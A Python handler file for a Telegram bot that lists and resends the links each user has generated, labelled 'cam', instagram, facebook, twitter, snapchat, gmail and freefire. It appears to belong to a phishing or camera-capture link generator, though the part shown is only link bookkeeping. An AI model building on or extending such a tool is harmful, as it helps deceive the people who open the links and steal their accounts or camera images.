from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton
from bot.config import BASE_URL
from bot.utils.storage import link_cache

def handle_all_links(bot, message, get_bottom_buttons):
    user_id = message.chat.id
    
    # Find all links generated by this user
    user_links = []
    for key, val in link_cache.items():
        if str(val.get("user_id")) == str(user_id):
            link_type = val.get("type", "unknown")
            
            # Construct full link from stored data
            if 'link' in val and val['link'].startswith('http'):
                full_link = val['link']
            else:
                # Fallback: construct from BASE_URL
                full_link = f"{BASE_URL}/p/{key}?v={user_id}"
            
            user_links.append((link_type, full_link))
    
    if not user_links:
        bot.send_message(
            user_id,
            "📭 *No links found.*\n\nGenerate some links first using the buttons below.",
            reply_markup=get_bottom_buttons(),
            parse_mode="Markdown"
        )
        return
    
    # Prepare message with full links
    message_text = "🔗 *Your Generated Links:*\n\n"
    for link_type, link_url in user_links:
        emoji = {
            'cam': '📸', 'instagram': '📸', 'ig': '📸',
            'facebook': '📘', 'face': '📘',
            'twitter': '🐦', 'twit': '🐦',
            'snapchat': '👻', 'snap': '👻',
            'gmail': '📧',
            'freefire': '🎮', 'free': '🎮'
        }.get(link_type, '🔗')
        message_text += f"{emoji} *{link_type.upper()}*: `{link_url}`\n\n"
    
    # Add copy button
    markup = InlineKeyboardMarkup(row_width=1)
    markup.add(
        InlineKeyboardButton("📋 Copy All Links", callback_data="copy_all")
    )
    
    bot.send_message(
        user_id,
        message_text,
        reply_markup=markup,
        parse_mode="Markdown"
    )

def handle_copy_all(bot, call):
    user_id = call.from_user.id
    
    # Get all full links again
    user_links = []
    for key, val in link_cache.items():
        if str(val.get("user_id")) == str(user_id):
            if 'link' in val and val['link'].startswith('http'):
                user_links.append(val['link'])
            else:
                # Construct full link
                full_link = f"{BASE_URL}/p/{key}?v={user_id}"
                user_links.append(full_link)
    
    if not user_links:
        bot.answer_callback_query(call.id, "❌ No links to copy!")
        return
    
    # Combine all links into one text
    all_links_text = "\n".join(user_links)
    
    bot.send_message(
        user_id,
        f"📋 *All your links (copy them below):*\n\n```\n{all_links_text}\n```",
        parse_mode="Markdown"
    )
    bot.answer_callback_query(call.id, "✅ Links sent! Copy them from the message above.")
